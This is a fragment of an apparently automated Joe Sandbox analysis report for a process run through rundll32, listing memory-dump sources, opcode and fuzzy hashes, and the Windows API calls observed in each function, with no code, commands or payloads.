                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: FileModuleName$LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 4113206344-0
                                                                              • Opcode ID: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
                                                                              • Instruction ID: 2479e45ecd0e058bd3906a538de623a8e1527f19010b68bb0c52570cc36cecdc
                                                                              • Opcode Fuzzy Hash: b00471fcab1b5f395def946c6beb6615941054bb9164cc0f92cc80501cac9ca7
                                                                              • Instruction Fuzzy Hash: 8AE0ED79A007109BDB10DF58D8C4A6737E4AB08758F044591ED14CF34AE371E91087E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: InfoSystem
                                                                              • String ID:
                                                                              • API String ID: 31276548-0
                                                                              • Opcode ID: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                              • Instruction ID: e7ee4332e3bf1793d33768c22cd59a7f60635682fbe11287ecce45151c97a8a7
                                                                              • Opcode Fuzzy Hash: 84ad2fbfb8aecb0fe2e08319b56d833cf1bf3e3b20a4b6675d57978a842bf5d4
                                                                              • Instruction Fuzzy Hash: 5CA0121C4089015AC404A7996C8240F32801941418FC40710645CA5282E705D56403D7
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,?,041E5C63), ref: 041E5663
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: ff65e47c46d7f47d85c1269def5c0d950eb09a095f16d21d1e6517253e7271e5
                                                                              • Instruction ID: c0c307c8a8d77189083588b5868e056dc9339d7b624e097071fa3dcd57d2dbb7
                                                                              • Opcode Fuzzy Hash: ff65e47c46d7f47d85c1269def5c0d950eb09a095f16d21d1e6517253e7271e5
                                                                              • Instruction Fuzzy Hash: 99F08CB2B413025BEB149FB89A807567BD6E7083D4F10427EEA09DB798D7B498018780
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 043FD1F8: EnumChildWindows.USER32(00010486,043FD15C,00000000), ref: 043FD241
                                                                                • Part of subcall function 043FD1F8: SendMessageW.USER32(0001048C,00000102,?,00000000), ref: 043FD29A
                                                                                • Part of subcall function 043FD1F8: Sleep.KERNEL32(0000005A,00000000,043FD315,?,?,?,00000000,00000000,?,043FD372), ref: 043FD2A5
                                                                                • Part of subcall function 043FD1F8: EnumChildWindows.USER32(00010486,043FD15C,00000000), ref: 043FD2CD
                                                                                • Part of subcall function 043FD1F8: PostMessageW.USER32(0001048C,000000F5,00000000,00000000), ref: 043FD2EA
                                                                              • Sleep.KERNEL32(0000012C), ref: 043FD37B
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ChildEnumMessageSleepWindows$PostSend
                                                                              • String ID:
                                                                              • API String ID: 1775905075-0
                                                                              • Opcode ID: e4a4f7327eb8c72673409f91a7b16c8dbf35ea755d0a6ee179854be872fe2cc0
                                                                              • Instruction ID: c1ce14e3d4dbdd0154e6eae81fa83e1db178956c9183db59955d5e697460802f
                                                                              • Opcode Fuzzy Hash: e4a4f7327eb8c72673409f91a7b16c8dbf35ea755d0a6ee179854be872fe2cc0
                                                                              • Instruction Fuzzy Hash: 7DB0126431070081FF40BF789D4895C23407F05358FC06282D753170D2C61C3C015151
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 041ECE35
                                                                              • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 041ECE46
                                                                              • FindFirstFileW.KERNEL32(?,?,kernel32.dll,?,?,?), ref: 041ECF46
                                                                              • FindClose.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 041ECF58
                                                                              • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,?,?,?), ref: 041ECF64
                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,?,?,?), ref: 041ECFA9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                              • String ID: GetLongPathNameW$\$kernel32.dll
                                                                              • API String ID: 1930782624-3908791685
                                                                              • Opcode ID: 2b9734fd79cbe259ada1325da150105158ec8b3ba40e9d5bd9ceeffa892316bd
                                                                              • Instruction ID: 345d74403e63a3caf8023f1af7d7bcd34c2617fbbd382e044f0dda2d80b79726
                                                                              • Opcode Fuzzy Hash: 2b9734fd79cbe259ada1325da150105158ec8b3ba40e9d5bd9ceeffa892316bd
                                                                              • Instruction Fuzzy Hash: FF41BE3AB00A199BDB24DEAACCC4AFEB7B5AF44314F1485A49405A7250FB74BE41DBC4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 043BAD02
                                                                              • IsIconic.USER32(?), ref: 043BAD30
                                                                              • IsWindowVisible.USER32(?), ref: 043BAD40
                                                                              • ShowWindow.USER32(?,00000000,00000000,?,?,?,043C8063,?,044171C0), ref: 043BAD5D
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 043BAD70
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 043BAD81
                                                                              • ShowWindow.USER32(?,00000006,00000000,?,?,?,043C8063,?,044171C0), ref: 043BADA1
                                                                              • ShowWindow.USER32(?,00000005,00000000,?,?,?,043C8063,?,044171C0), ref: 043BADAB
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$LongShow$IconicVisible
                                                                              • String ID:
                                                                              • API String ID: 3484284227-0
                                                                              • Opcode ID: e2d2d2bda7e48cdee300b696ed73125804b916b6193880a82d11273c920ab12f
                                                                              • Instruction ID: 731299e8168c0c75a8278acaca30ff701e37860197cd243040e37b9e35697f22
                                                                              • Opcode Fuzzy Hash: e2d2d2bda7e48cdee300b696ed73125804b916b6193880a82d11273c920ab12f
                                                                              • Instruction Fuzzy Hash: 3211E74264EE9038E72232290C91FEF1DDD4FC3326F1D496DF7D4911C2D768A14692A6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • IsValidLocale.KERNEL32(?,00000002,00000000,041ECB21,?,?,?,00000000), ref: 041ECA66
                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,041ECB21,?,?,?,00000000), ref: 041ECA82
                                                                              • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,041ECB21,?,?,?,00000000), ref: 041ECA93
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Locale$Info$Valid
                                                                              • String ID:
                                                                              • API String ID: 1826331170-0
                                                                              • Opcode ID: 780d12ff149f7b81132328f87bf36d03f8a6928e414cc4c188f6fbb6d00fd7b2
                                                                              • Instruction ID: f420ee52ad4b0e91ea913bab73ef7bd4b326063d4baa066bed590f2fab4b7a1b
                                                                              • Opcode Fuzzy Hash: 780d12ff149f7b81132328f87bf36d03f8a6928e414cc4c188f6fbb6d00fd7b2
                                                                              • Instruction Fuzzy Hash: 2A319E38A00A18EBEB24DB96DCC1BEEB7B6EB84705F5100E5A50863240E7356E80DE94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Version
                                                                              • String ID:
                                                                              • API String ID: 1889659487-0
                                                                              • Opcode ID: b7087886c27c530dce120c468aba7975aa27e0d696559cc617a25ffa8329e88b
                                                                              • Instruction ID: 29ba0c93793f16c267e38b96d1ee9b5c45e200ae405dbd502ffd8b86af423e9c
                                                                              • Opcode Fuzzy Hash: b7087886c27c530dce120c468aba7975aa27e0d696559cc617a25ffa8329e88b
                                                                              • Instruction Fuzzy Hash: 0CD0A77D960D0B51EB204B11EDC037D21A1E381744FE18071C6114D99AD73DA4C29501
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Iconic
                                                                              • String ID:
                                                                              • API String ID: 110040809-0
                                                                              • Opcode ID: de774d1c27495023c9e14b793e7d3173a7ffa328ea6e595948f5eb0871acfdb4
                                                                              • Instruction ID: 6ec41cb75cd664b921c961dc2dcbf3b4d560ee28dc823db535c3b8fec2619ef2
                                                                              • Opcode Fuzzy Hash: de774d1c27495023c9e14b793e7d3173a7ffa328ea6e595948f5eb0871acfdb4
                                                                              • Instruction Fuzzy Hash: 8BC012709000406BEB01FA68C880A843B92B781306FD04A90E142C615ACB3AA8858BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                              • Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
                                                                              • Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                              • Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 041E8739
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 041E873F
                                                                              • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 041E8752
                                                                              • GetLastError.KERNEL32(00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 041E875B
                                                                              • GetLogicalProcessorInformation.KERNEL32(?,?,00000000,041E87D2,?,00000000,?,00000000,kernel32.dll,GetLogicalProcessorInformation), ref: 041E8786
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: InformationLogicalProcessor$AddressErrorHandleLastModuleProc
                                                                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                                              • API String ID: 1184211438-79381301
                                                                              • Opcode ID: d33bab5378bac1477687f4b91fdcddcc9479338ea3739362647c01c1c00710cc
                                                                              • Instruction ID: f0aaedc14cb592f90ee3f9bfaf86d52b245bea8507863d252cbd773161c46876
                                                                              • Opcode Fuzzy Hash: d33bab5378bac1477687f4b91fdcddcc9479338ea3739362647c01c1c00710cc
                                                                              • Instruction Fuzzy Hash: D2117F79D00A08AEEB10EFE7C8C0B7DB7F5EB41308F5484D6E404A3580D775BA808B11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 042158A5
                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 042158C1
                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 042158FA
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 04215977
                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 04215990
                                                                              • VariantCopy.OLEAUT32(?), ref: 042159C5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                              • String ID:
                                                                              • API String ID: 351091851-3916222277
                                                                              • Opcode ID: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                                                                              • Instruction ID: cf3126c4db8e9667566fbdd8aee0b49aaaa78283524552593263ec0805e40c58
                                                                              • Opcode Fuzzy Hash: 53daf564fbfc4f2e90bc9f908b06c784015e8e5d50bafb180f1ae0b614ca888d
                                                                              • Instruction Fuzzy Hash: C0510DB5A10619AFDB22EB58CC80AD9B3FDAF59314F0041D5E509A7221DA70BF818FA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?), ref: 041E5D82
                                                                              • Sleep.KERNEL32(0000000A,00000000,?), ref: 041E5D9C
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: bfe12e0a965e0a8ae89ae61f32f90924946e7f31ee9ad63e4dc3e3d6da22ab1b
                                                                              • Instruction ID: 372911cac0421e6308eafa42d2487fc422c9895276ff28943e939140c24b567d
                                                                              • Opcode Fuzzy Hash: bfe12e0a965e0a8ae89ae61f32f90924946e7f31ee9ad63e4dc3e3d6da22ab1b
                                                                              • Instruction Fuzzy Hash: 2271F739704B00AFE715CFAAC8C4B36BBD6EF45318F1882AAD5448B392D774E841CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetCapture.USER32 ref: 043C7AC6
                                                                              • IsWindowUnicode.USER32(00000000), ref: 043C7B09
                                                                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 043C7B24
                                                                              • SendMessageA.USER32(00000000,-0000BBEE,?,?), ref: 043C7B43
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 043C7B52
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 043C7B63
                                                                              • SendMessageW.USER32(00000000,-0000BBEE,?,?), ref: 043C7B83
                                                                              Memory Dump Source
